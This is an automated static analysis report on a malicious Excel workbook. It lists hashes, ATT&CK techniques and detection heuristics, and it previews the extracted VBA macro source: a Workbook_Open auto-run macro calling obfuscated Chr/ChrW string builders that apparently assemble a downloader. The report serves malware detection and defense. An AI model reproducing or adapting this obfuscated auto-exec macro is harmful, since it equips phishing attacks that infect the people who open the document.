Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cb4149d1188e6b91…

MALICIOUS

Office (OOXML)

82.3 KB Created: 2021-06-23 08:35:37 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-02
MD5: 3c636bbf1232d770df7a7084dffcf7b2 SHA-1: c5402ca6b42890bc5d785c4293872100039dffd4 SHA-256: cb4149d1188e6b915625a730cbafdc607a5cf1eacfc695e36960b81c7303a494
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1037.001 Boot or Logon Initialization: Script Based

The OOXML file contains a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening the document. The macro utilizes CreateObject and appears to be designed to download and execute a second-stage payload, although the exact download URL or payload is obfuscated. The presence of a Workbook_Open macro and the use of CreateObject strongly suggest a malicious intent, likely delivered via spearphishing.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 35260 bytes
SHA-256: 6b201d965f6534a26a2e5e6360455574d5d22d4fdfbfe68cfa784e9f1c0e2ba3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
fvm_f_jccddbau = (Module1.pckllmgfzhqzjun())
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"
Function aikrn_k_z_gsmqu(ldqnhv_umj_sc_o)
aikrn_k_z_gsmqu = Chr(CLng((-534 + 589))) & Chr(CLng((47 And 60))) & ChrW(CLng((33 Xor 16))) & ChrW(CLng((51 And 53))) & Chr(CLng((941 - 889))) & Chr(CLng((8 Or 44))) & ChrW(CLng((-4.51977401129944E-02 * -708))) & Chr(CLng((-226 + 275))) & ChrW(CLng((16 Or 48))) & ChrW(CLng((53 Or 21))) & ChrW(CLng((Not -45))) & Chr(CLng((99 + -50))) & ChrW(CLng((49 And 49))) & Chr(CLng((10 Xor 60))) _
  & Chr(CLng((935 + -891))) & Chr(CLng((49 And 53))) & ChrW(CLng((5.04032258064516E-02 * 992))) & Chr(CLng((Not -50))) & Chr(CLng((-577 + 621))) & Chr(CLng((768 + -712))) & ChrW(CLng((48 Or 32))) & Chr(CLng((32 Or 12))) & Chr(CLng((Not -33))) & ChrW(CLng((Not -50))) & ChrW(CLng((36 Xor 21))) & Chr(CLng((52 Or 4))) & Chr(CLng((59 Xor 27))) & Chr(CLng((4.34353405725568E-02 * 1013))) _
  & ChrW(CLng((Not -50))) & Chr(CLng((0.340277777777778 * 144))) & ChrW(CLng((8.49220103986135E-02 * 577))) & ChrW(CLng((-70 + 114))) & Chr(CLng((-698 + 747))) & ChrW(CLng((729 - 680))) & Chr(CLng((-841 + 895))) & Chr(CLng((23 Xor 55))) & Chr(CLng((4.23892100192678E-02 * 1038))) & ChrW(CLng((-108 - -140))) & ChrW(CLng((Not -50))) & Chr(CLng((891 - 842))) _
  & Chr(CLng((63 Xor 14))) & ChrW(CLng((-6.97305863708399E-02 * -631))) & ChrW(CLng((57 Or 32))) & Chr(CLng((-323 + 380))) & ChrW(CLng((40 And 35))) & ChrW(CLng((0 Or 44))) & Chr(CLng((0.127937336814621 * 383))) & ChrW(CLng((Not -50))) & Chr(CLng((61 And 49))) & Chr(CLng((722 - 678))) & ChrW(CLng((Not -33))) & Chr(CLng((-874 - -923)))
Debug.Print aikrn_k_z_gsmqu
End Function
Function nmcdxpcmiheqtze(kxletww_obpnua)
nmcdxpcmiheqtze = ChrW(CLng((-653 - -701))) & Chr(CLng((-343 + 399))) & Chr(CLng((62 And 45))) & ChrW(CLng((6.15199034981906E-02 * 829))) & Chr(CLng((59 And 50))) & Chr(CLng((-68 + 100))) & ChrW(CLng((44 And 47))) & Chr(CLng((795 - 741))) & Chr(CLng((49 Or 33))) & ChrW(CLng((8 Or 36))) & Chr(CLng((587 - 536))) & ChrW(CLng((-546 + 596))) & ChrW(CLng((12 Or 32))) & Chr(CLng((115 + -64))) _
  & ChrW(CLng((6.71834625322997E-02 * 774))) & ChrW(CLng((58 + -26))) & Chr(CLng((Not -45))) & Chr(CLng((-0.112280701754386 * -285))) & ChrW(CLng((416 + -367))) & ChrW(CLng((48 Or 33))) & ChrW(CLng((-730 + 784))) & ChrW(CLng((6.68693009118541E-02 * 658))) & ChrW(CLng((-3.74707259953162E-02 * -854))) & ChrW(CLng((-575 - -624))) & ChrW(CLng((-398 - -446))) _
  & Chr(CLng((-907 + 963))) & ChrW(CLng((-813 + 845))) & Chr(CLng((54 Xor 26))) & Chr(CLng((32 And 56))) & Chr(CLng((6 Xor 55))) & ChrW(CLng((1003 + -954))) & ChrW(CLng((-534 - -587))) & ChrW(CLng((46 And 44))) & ChrW(CLng((55 And 52))) & Chr(CLng((Not -58))) & Chr(CLng((0 Or 32))) & Chr(CLng((680 + -636))) & ChrW(CLng((53 Or 1))) & ChrW(CLng((27 Xor 43))) _
  & ChrW(CLng((-521 - -565))) & Chr(CLng((-7.92682926829268E-02 * 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 78848 bytes
SHA-256: 54373a0534838ab5ca94434524e9757f7d9beae24cce21e7e55a3ec6a20bfba9